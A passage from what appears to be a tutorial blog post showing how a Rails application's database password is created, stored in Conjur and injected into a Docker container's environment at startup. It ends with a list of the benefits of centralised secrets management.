$ rails new gee-whiz-app

2. A developer or ops team member creates the secret (e.g. by provisioning a new database)

$ passwd=$(openssl rand -hex 32)
$ rds-create-db-instance SimCoProd01 -s 10 -c db.m1.large -e mysql -u master -p "$passwd"

3. The developer or ops team member loads the secret into a Conjur Variable.

$ conjur variable create -v "$passwd" dev/apps/gee-whiz-app/mysql/password

4. The developer codes the application to retrieve the secret from the process environment.

DB.connect user: 'admin', password: ENV['MYSQL_ADMIN_PASSWORD']

5. The application is bundled into a Docker container.

$ docker build -t gee-whiz-app ./

6. When the container is started, the secret is fetched from Conjur and passed into the container’s process environment with Docker’s -e option (here $DEPLOYMENT names the environment, dev in step 3). The container then starts up in the normal Docker fashion. Note that a value given as -e NAME=value appears in the docker run argument list on the host; exporting MYSQL_ADMIN_PASSWORD in the calling shell and passing -e MYSQL_ADMIN_PASSWORD (name only) keeps it out of the process list.

$ docker run -p 3000:3000 -e MYSQL_ADMIN_PASSWORD="$(conjur variable value "$DEPLOYMENT/apps/gee-whiz-app/mysql/password")" gee-whiz-app

7. The application starts up in the container, and its secrets are available!

$ open http://localhost:3000

Benefits

As always, using Conjur to manage and deploy secrets has the following advantages:

  • Secrets are kept out of source control, so they aren’t exposed beyond the minimum “need-to-know” privilege.
  • Secrets are always kept in memory and never written to disk, so they aren’t captured in images and backups and then accidentally leaked.
  • Permission to update and fetch secrets is rigorously controlled, so that production secrets are governed by least-privilege principles while development secrets are easy for developers to use and modify.
  • Every time a secret is modified or used, a record is written to Conjur, so that the usage and permissions of secrets can be easily and automatically audited.

If you’re interested in a full code walk-through of Conjur and Docker, head over to the Docker + Conjur Secrets Tutorial on the Conjur web site!

]]>